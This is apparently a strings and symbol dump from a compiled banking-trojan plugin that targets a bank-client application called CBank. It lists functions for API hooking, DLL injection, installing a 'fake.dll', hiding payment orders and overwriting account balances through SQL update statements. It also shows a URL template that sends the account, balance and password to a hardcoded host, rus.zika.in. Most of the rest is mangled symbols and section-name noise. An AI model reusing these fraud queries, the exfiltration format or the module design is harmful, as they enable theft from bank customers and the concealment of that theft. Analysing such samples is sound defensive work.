TMemory::AsStr
File::IsExists
FileName
TBotObject::TBotObject
ODBC::ODBC
ODBC::~ODBC
ODBC::`scalar deleting destructor'
CBank::CloseDB
CBank::CreateDB
CBank::GetAdminUrl
rus.zika.in
CBank::InitData
CBank::SumToInt
CBank::ValueToInt
CBank::ReadDate
CBank::ReadString
MemPtr<512>::MemPtr<512>
MemPtr<512>::~MemPtr<512>
MemPtr<512>::operator char *
MemPtr<512>::str
TString<char>::t_str
BBS_CALC::DBGOutMessage<char const *,char const *,unsigned char *>
Module
BBS_CALC::DBGOutMessage<char const *,char const *>
Module
pushargEx<1,1033466613,47,int>
newfunc
BBS_CALC::DBGOutMessage<char const *,char const *,char *,char *>
Module
BBS_CALC::DBGOutMessage<char const *,char const *,char *>
Module
pushargEx<1,2000917480,50,int,char *,unsigned int>
newfunc
pushargEx<1,1539428687,94,int,int>
newfunc
pushargEx<1,4224075867,187,void *,tagPROCESSENTRY32W *>
newfunc
pushargEx<1,2577672605,90,int,int,unsigned long>
newfunc
pushargEx<18,3841663377,514,void *,int,char *,int>
newfunc
pushargEx<1,1916711125,17,void *>
newfunc
pushargEx<1,2557808435,188,void *,tagPROCESSENTRY32W *>
newfunc
pushargEx<19,3873697281,521,char *>
newfunc
pushargEx<1,1493072574,54,unsigned int,char *>
newfunc
pushargEx<19,4167737846,524,char *,char *>
newfunc
pushargEx<1,168244599,169,char *,int>
newfunc
pushargEx<19,4167737846,524,char *,char const *>
newfunc
BBS_CALC::DBGOutMessage<char const *,char const *,char *,unsigned long>
Module
BBS_CALC::DBGOutMessage<char const *,char const *,unsigned short,unsigned short,short>
Module
BBS_CALC::DBGOutMessage<char const *,char const *,unsigned long,unsigned long>
Module
pushargEx<1,2180051167,35,char *>
newfunc
pushargEx<1,1764098386,109>
newfunc
STRBUF::GetRec<char>
CBank::HandlerSQLDriverConnectA
ConnectionHandle
WindowHandle
InConnectionString
StringLength1
OutConnectionString
BufferLength
StringLength2Ptr
DriverCompletion
StringConnect='%s'
CBank::SetHooks
CBank::IsRunBClient
CBank::ReadReplacement
: %s %s
 %02d.%02d.%02d
: %s, 
CBank::HidePayments
dateFirst
pwsprintfA
sqlBuf
it is16 it
update PAYDOCRU set DOCUMENTDATE=?, STATUS=30001 where PAYERACCOUNT=? and DOCUMENTDATE=? and DOCUMENTNUMBER like '%%%s%%'
 %s %s
select min(DOCUMENTDATE) from PAYDOCRU
STRBUF::Release<char>
TString<char>::~TString<char>
CBank::GrabAndSendBalance
__formal
Account
Response
pwsprintfA
http://%s/set/bal.html?uid=%s&type=bss&sum=%s&acc=%s&pass=%s&cid=%s
Rest=%s, Account=%s
select Rest,Account from Account
os31 os31
CBank::SendCBank
folderSize
cryptName
folderCBank
tempFolder
CBankClient
cbank_copy.txt
CBank::ReplacementBalance
pwsprintfA
sqlBuf
closingBalance
openingBalance
dateBalance
obalance
update
update ACCOUNT set REST=%s where ACCOUNT=?
select CLOSINGBALANCE from STATEMENTRU where STATEMENTDATE=(select Max(STATEMENTDATE) from STATEMENTRU) and CLOSINGBALANCE<>0
is16 it
update STATEMENTRU set OPENINGBALANCE=%d.%d, CLOSINGBALANCE = %d.%d where ACCOUNT=? and STATEMENTDATE=?
: %u, 
: %s, 
select OPENINGBALANCE,CLOSINGBALANCE,STATEMENTDATE from STATEMENTRU where ACCOUNT=? and STATEMENTDATE>=? and OPENINGBALANCE<>0 order by STATEMENTDATE
os16 os16 ot is16 it
t!SSSWS
	CBank::ThreadHideReplacement
__formal
fileFlag
CBank::InstallFakeDll
pathExe
install
TInstall2
dllBody
intaller
pathSystem
dllSize
botData
installed
 fake.dll 
 fake.dll 
 fake.dll
fake.dll 
system
CryptLib.DLL
TString<char>::`scalar deleting destructor'
CBank::WorkInCBank
__formal
folderCBank
	CBank::WaitRunCBank
__formal
Start '%s'
WaitRunCBank
CBank::Start
e:\projects\progs\petrosjan\bjwj\builds\bot_plug\objs\release debugconfig\vc90.pdb
@comp.id	x
@feat.00
.drectve
.debug$S
.rdata
.rdata
.debug$S
.rdata
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.debug$S
_domain
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.rdata
.debug$S
.debug$S
.debug$S
.rdata
.rdata
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.debug$S
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.debug$S
.rdata
.debug$S
.rdata
.rdata
.rdata
.debug$S
.debug$T
?pHandlerSQLDriverConnectA@CBank@@3P6GFPAXPAUHWND__@@PAEF2FPAFG@ZA
?pHandlerSQLPrepareA@CBank@@3P6GFPAXPAEJ@ZA
?pHandlerSQLExecDirectA@CBank@@3P6GFPAXPAEJ@ZA
?pHandlerSQLExecute@CBank@@3P6GFPAX@ZA
?Hibernation@TVideoRecDLL@@2HB
?RunCallback@TVideoRecDLL@@2HB
_restFixeds
_sizeRestFixeds
_runHideReplacement
??1TBotObject@@UAE@XZ
??_7TBotObject@@6B@
??_GTBotObject@@UAEPAXI@Z
??_ETBotObject@@UAEPAXI@Z
??_GTBotObject@@UAEPAXI@Z
??3TBotObject@@SAXPAX@Z
??0TMemory@@QAE@K@Z
?MemAlloc@@YAPAXK@Z
??1TMemory@@QAE@XZ
?MemFree@@YAXPAX@Z
?AsStr@TMemory@@QAEPADXZ
?IsExists@File@@YA_NQAD@Z
?FileExistsA@@YA_NQAD@Z
??0TBotObject@@QAE@XZ
??0ODBC@@QAE@XZ
??_7ODBC@@6B@
??_GODBC@@UAEPAXI@Z
??_EODBC@@UAEPAXI@Z
??1ODBC@@UAE@XZ
?Close@ODBC@@QAEXXZ
??_GODBC@@UAEPAXI@Z
?CloseDB@CBank@@YAXPAVODBC@@@Z
?CreateDB@CBank@@YAPAVODBC@@XZ
?Connect@ODBC@@QAE_NPBD@Z
_strODBCConnect
??2TBotObject@@SAPAXI@Z
?GetAdminUrl@CBank@@YAPADPAD@Z
?m_lstrcpy@@YGXPADPBD@Z
??_C@_0M@INCJPEGB@rus?4zika?4in?$AA@
?InitData@CBank@@YA_NXZ
_hidePayments
_restAccounts
?SumToInt@CBank@@YAHPBDPAH@Z
?ValueToInt@CBank@@YAHPBDPAH@Z
?ReadDate@CBank@@YAHPBDPAUtagTIMESTAMP_STRUCT@@@Z
?m_memset@@YAPAXPAXKK@Z
?ReadString@CBank@@YAHPBDPAD@Z
??0?$MemPtr@$0CAA@@@QAE@XZ
??1?$MemPtr@$0CAA@@@QAE@XZ
??B?$MemPtr@$0CAA@@@QAEPADXZ
?str@?$MemPtr@$0CAA@@@QAEPADXZ
?t_str@?$TString@D@@QBEPADXZ
??_C@_11LOCGONAA@?$AA?$AA@
??$DBGOutMessage@PBDPBDPAE@BBS_CALC@@YAXPBD0PAE@Z
?MessageEx@Debug@@YAXPADK000ZZ
??$DBGOutMessage@PBDPBD@BBS_CALC@@YAXPBD0@Z
??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z
?GetProcAddressEx2@@YAPAXPADKKH@Z
??$DBGOutMessage@PBDPBDPADPAD@BBS_CALC@@YAXPBD0PAD1@Z
??$DBGOutMessage@PBDPBDPAD@BBS_CALC@@YAXPBD0PAD@Z
??$pushargEx@$00$0HHEDJDOI@$0DC@HPADI@@YAPAXHPADI@Z
??$pushargEx@$00$0FLMBNBEP@$0FO@HH@@YAPAXHH@Z
??$pushargEx@$00$0PLMGEIFL@$0LL@PAXPAUtagPROCESSENTRY32W@@@@YAPAXPAXPAUtagPROCESSENTRY32W@@@Z
??$pushargEx@$00$0JJKECJJN@$0FK@HHK@@YAPAXHHK@Z
??$pushargEx@$0BC@$0OEPLCBJB@$0CAC@PAXHPADH@@YAPAXPAXHPADH@Z
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z
??$pushargEx@$00$0JIHFAPDD@$0LM@PAXPAUtagPROCESSENTRY32W@@@@YAPAXPAXPAUtagPROCESSENTRY32W@@@Z
??$pushargEx@$0BD@$0OGODOOAB@$0CAJ@PAD@@YAPAXPAD@Z
??$pushargEx@$00$0FIPOHKLO@$0DG@IPAD@@YAPAXIPAD@Z
??$pushargEx@$0BD@$0PIGKKBPG@$0CAM@PADPAD@@YAPAXPAD0@Z
??$pushargEx@$00$0KAHDFHH@$0KJ@PADH@@YAPAXPADH@Z
??$pushargEx@$0BD@$0PIGKKBPG@$0CAM@PADPBD@@YAPAXPADPBD@Z
??$DBGOutMessage@PBDPBDPADK@BBS_CALC@@YAXPBD0PADK@Z
??$DBGOutMessage@PBDPBDGGF@BBS_CALC@@YAXPBD0GGF@Z
??$DBGOutMessage@PBDPBDKK@BBS_CALC@@YAXPBD0KK@Z
??$pushargEx@$00$0IBPAPANP@$0CD@PAD@@YAPAXPAD@Z
??$pushargEx@$00$0GJCGABFC@$0GN@@@YAPAXXZ
??$GetRec@D@STRBUF@@YAAAUTStrRec@0@PAD@Z
?HandlerSQLDriverConnectA@CBank@@YGFPAXPAUHWND__@@PAEF2FPAFG@Z
??_C@_05KCBIOJJH@CBank?$AA@
??_C@_0BD@BPOFENKK@StringConnect?$DN?8?$CFs?8?$AA@
?SetHooks@CBank@@YA_NXZ
?HookApi@@YAPAXKKPAX0@Z
?IsRunBClient@CBank@@YAKPAD@Z
?GetNameHashW@File@@YAKPA_W_N@Z
?ReadReplacement@CBank@@YAXPBD@Z
??_C@_0BI@IHAKEMMB@?Q?j?p?$PL?r?h?e?5?o?k?$OA?r?e?f?j?h?3?5?$CFs?5?$CFs?$AA@
??_C@_0BE@PIFLCLLB@?D?$OA?r?$OA?5?$CF02d?4?$CF02d?4?$CF02d?$AA@
??_C@_0CL@IGJOICEA@?O?n?d?l?e?m?$OA?5?a?$OA?k?$OA?m?q?$OA?5?d?k?$PP?5?q?w?e?r?$OA?3?5?$CFs?0?5?p@
?HidePayments@CBank@@YAXXZ
??_C@_0L@JNLGEKIE@it?5is16?5it?$AA@
??_C@_02DKCKIIND@?$CFs?$AA@
??_C@_0HK@EAGNMGLN@update?5PAYDOCRU?5set?5DOCUMENTDATE@
??_C@_0BI@EBIIPLGB@?Q?j?p?$PL?b?$OA?e?l?5?o?k?$OA?r?e?f?j?s?5?$CFs?5?$CFs?$AA@
?Get_wsprintfA@@YAP6AHPADPBDZZXZ
?CloseQuery@ODBC@@QAEXPAX@Z
?ExecuteSql@ODBC@@QAAPAXPBD0ZZ
??_C@_0CH@FBOGNHJD@select?5min?$CIDOCUMENTDATE?$CJ?5from?5PA@
??_C@_02IGGBGAC@ot?$AA@
??_C@_0BC@BACCNDKH@?Q?j?p?$PL?b?$OA?e?l?5?o?k?$OA?r?e?f?j?h?$AA@
??$Release@D@STRBUF@@YAXAAPAD@Z
?Free@HEAP@@YAXPAX@Z
??1?$TString@D@@UAE@XZ
??_7?$TString@D@@6B@
??_G?$TString@D@@UAEPAXI@Z
??_E?$TString@D@@UAEPAXI@Z
?GrabAndSendBalance@CBank@@YGKPAX@Z
??_C@_0BP@HANHEPED@?M?e?5?s?d?$OA?k?n?q?$PM?5?o?n?d?j?k?$PO?w?h?r?$PM?q?$PP?5?j?5?a?$OA?g?e?$AA@
??_C@_0BF@MPLHCIOG@?G?$OA?o?p?n?q?5?m?e?5?b?$PL?o?n?k?m?h?k?q?$PP?$AA@
?Clear@HTTPResponse@@YAXPAUTHTTPResponseRec@@@Z
?Get@HTTP@@YA_NPADPAPADPAUTHTTPResponseRec@@@Z
??_C@_0BD@DDPGNANN@?N?r?q?$PL?k?$OA?e?l?5?g?$OA?o?p?n?q?5?$CFs?$AA@
??_C@_0EE@PFJMPOJF@http?3?1?1?$CFs?1set?1bal?4html?$DPuid?$DN?$CFs?$CGty@
?BOT_UID@@3PADA
?GetAzUser@@YA?AV?$TString@D@@XZ
??_C@_0M@MOGILOCL@?O?$OA?p?n?k?$PM?$DN?8?$CFs?8?$AA@
?m_memcpy@@YAPAXPAXPBXH@Z
?m_strstr@@YGPADPBD0@Z
??_C@_04EKGPJNJA@PWD?$DN?$AA@
??_C@_0BE@JDHPLJNL@Rest?$DN?$CFs?0?5Account?$DN?$CFs?$AA@
??_C@_0CB@CCGFKHGD@select?5Rest?0Account?5from?5Account@
??_C@_09HFNFHLLP@os31?5os31?$AA@
??_C@_0BP@IIFKIJFM@?F?d?e?l?5?q?r?p?n?j?h?5?o?n?d?j?k?$PO?w?e?m?h?$PP?5?j?5?a?$OA?g?e?$AA@
?SendCBank@CBank@@YGKPAX@Z
??_C@_0BP@IDJMLBPP@?J?n?o?h?p?n?b?$OA?m?h?e?5?m?$OA?5?q?e?p?b?e?p?5?n?j?n?m?w?e?m?n?$AA@
?CreateFileA@TBotApplication@@QAE?AV?$TString@D@@PBD0@Z
?SendFiles@VideoProcess@@YAKHPBD0H_N@Z
??_C@_0BG@BGOBHAAG@?J?n?o?h?p?n?b?$OA?m?h?e?5?m?$OA?5?q?e?p?b?e?p?$AA@
?CopyFileANdFolder@@YA_NPAD0@Z
??_C@_0CC@IONMLDMD@?J?n?o?h?p?n?b?$OA?m?h?e?5?b?n?5?b?p?e?l?e?m?m?s?$PO?5?o?$OA?o?j?s?5?$CF@
?DeleteFolders@@YA_NPAD@Z
?IsExists@Directory@@YA_NQAD@Z
?m_lstrlen@@YGKPBD@Z
??_C@_0CI@LJEPKDEK@?$NN?r?$OA?5?o?$OA?o?j?$OA?5?m?$OA?5?d?$OA?m?m?$PL?i?5?l?n?l?e?m?r?5?b?$PL?j?$OA?w@
?FolderIsUpload@VideoProcess@@YA_NPBD0@Z
?CryptFileName@UIDCrypt@@YAPADPBD_N@Z
??_C@_0M@PBODJNDL@CBankClient?$AA@
??_C@_0CP@IEMPBFLF@?g?$OA?o?s?q?j?5?n?r?q?$PL?k?j?h?5?o?p?n?c?p?$OA?l?l?$PL?5?m?$OA?5?q?e?p?b@
??_C@_0DG@IMBNOFEJ@?O?$OA?o?j?$OA?5?o?p?n?c?p?$OA?l?l?$PL?5?a?n?k?$PM?x?e?5?g?$OA?d?$OA?m?m?n?c?n@
?SizeFolderLess@@YA_NPBDKPAK@Z
??_C@_0BK@FAGEJPGG@?J?k?h?e?m?r?5?s?f?e?5?a?$PL?k?5?q?j?n?o?h?p?n?b?$OA?m?$AA@
?FileExists@TBotApplication@@QAE_NPBD0@Z
??_C@_0P@BIENEIJC@cbank_copy?4txt?$AA@
?Bot@@3PAVTBotApplication@@A
?Free@STR@@YAXPAD@Z
?ReplacementBalance@CBank@@YAXXZ
?WriteBufferA@File@@YAKPBDQAXK@Z
?MakeFileName@BOT@@YA?AV?$TString@D@@PBD0@Z
?GetStr@@YA?AV?$TString@D@@PBD@Z
?CBankRestFixed@@3PADA
??_C@_04HIMAAMHO@is16?$AA@
??_C@_0CL@LKBJPMLC@update?5ACCOUNT?5set?5REST?$DN?$CFs?5where@
??_C@_0HO@NEMLFJLJ@select?5CLOSINGBALANCE?5from?5STATE@
??_C@_04PHIAPJNO@os16?$AA@
?NextRow@ODBC@@QAE_NPAX@Z
??_C@_07MFNJCLPN@is16?5it?$AA@
??_C@_0GI@NNNFNLFH@update?5STATEMENTRU?5set?5OPENINGBA@
??_C@_0CO@PHIFKFHB@?M?n?b?$PL?e?5?b?u?n?d?m?n?i?5?a?$OA?k?$OA?m?q?3?5?$CFu?0?5?b?$PL?u?n?d?m@
?MemRealloc@@YAPAXPAXK@Z
?m_memcmp@@YAHPBX0I@Z
?m_lstrcmp@@YGKPBD0@Z
??_C@_0CI@GLNJHFAD@?B?u?n?d?m?n?i?5?a?$OA?k?$OA?m?q?3?5?$CFs?0?5?b?$PL?u?n?d?m?n?i?5?a?$OA?k@
??_C@_0JG@LIFJMJKG@select?5OPENINGBALANCE?0CLOSINGBAL@
??_C@_0BF@IIDHLEOE@os16?5os16?5ot?5is16?5it?$AA@
??_C@_0BE@JDGNJONO@?Q?w?e?r?5?$CFs?0?5?p?$OA?g?m?h?v?$OA?5?$CFd?$AA@
??_C@_0BN@CPIHBPGK@?N?q?s?y?e?q?r?b?k?$PP?e?l?5?o?n?d?l?e?m?s?5?a?$OA?k?$OA?m?q?$OA?$AA@
?ThreadHideReplacement@CBank@@YGKPAX@Z
?RecordPID@VideoProcess@@YA_NHPBDKHH@Z
?CBankReplacement@@3PADA
??_C@_0BJ@BCGNMNDL@?G?$OA?o?s?q?j?5?o?n?d?l?e?m?$PL?5?h?5?q?j?p?$PL?r?h?$PP?$AA@
?CBankFlagUpdate@@3PADA
?ReadToBufferA@File@@YAPAEPBDAAK@Z
?InstallFakeDll@CBank@@YGKPAX@Z
??1TPlugin@@UAE@XZ
?EStrFakeDllCBankFlag@@3PADA
??_C@_0CG@HFJANHME@?H?m?q?r?$OA?k?$PP?v?h?$PP?5fake?4dll?5?s?q?o?e?x?m?n?5?b?$PL?o?n@
??_C@_0CB@HPHHGMH@?H?m?q?r?$OA?k?$PP?v?h?$PP?5fake?4dll?5?m?e?5?b?$PL?o?n?k?m?e?m?$OA@
?KillBlockingProcesses@@YAXPBD@Z
?GetProcAddress@TMemoryDLL@@QAE_NKAAPAX@Z
??_C@_0CN@KFPPHDDH@?O?k?$OA?c?h?m?5?s?q?o?e?x?m?n?5?g?$OA?c?p?s?f?e?m?$PL?0?5?m?$OA?w?h?m?$OA@
?LoadBotPlug@@YGHPAPAXPAK@Z
??_C@_0BM@IEBKDNGC@?O?k?$OA?c?h?m?5?m?e?5?s?d?$OA?k?n?q?$PM?5?g?$OA?c?p?s?g?h?r?$PM?$AA@
?Download@TPlugin@@QAE_N_N@Z
??0TPlugin@@QAE@ABV?$TString@D@@@Z
?EStrFakeDllInstaller@@3PADA
??_C@_0BN@EINGLELF@?M?$OA?w?h?m?$OA?e?l?5?h?m?q?r?$OA?k?$PP?v?h?$PO?5fake?4dll?$AA@
??_C@_0BJ@JEEDAMPC@fake?4dll?5?s?f?e?5?s?q?r?$OA?m?n?b?k?e?m?$OA?$AA@
?FakeDllCBankInstalled@BOT@@YA_NXZ
??_C@_06FHFOAHML@system?$AA@
??_C@_0N@IMDPHKCD@CryptLib?4DLL?$AA@
??_G?$TString@D@@UAEPAXI@Z
?WorkInCBank@CBank@@YGKPAX@Z
?RunThread@@YAXPAX0@Z
?StartThread@@YGPAXPAX0@Z
??_C@_0BN@INAJPDJ@?G?$OA?h?m?f?e?j?r?h?k?h?q?$PM?5?b?5?o?p?n?v?e?q?q?5?8?$CFs?8?$AA@
?Initialize@BOT@@YAXW4TProcessType@@@Z
?WaitRunCBank@CBank@@YGXPAX@Z
?New@STR@@YAPADPADK@Z
?InjectIntoProcess@@YA_NKP6GKPAX@Z@Z
??_C@_0L@FIBPOKKE@Start?5?8?$CFs?8?$AA@
??_C@_05PCLGFONP@?QBank?$AA@
??_C@_0N@GMAGFDBL@WaitRunCBank?$AA@
?Start@CBank@@YAXXZ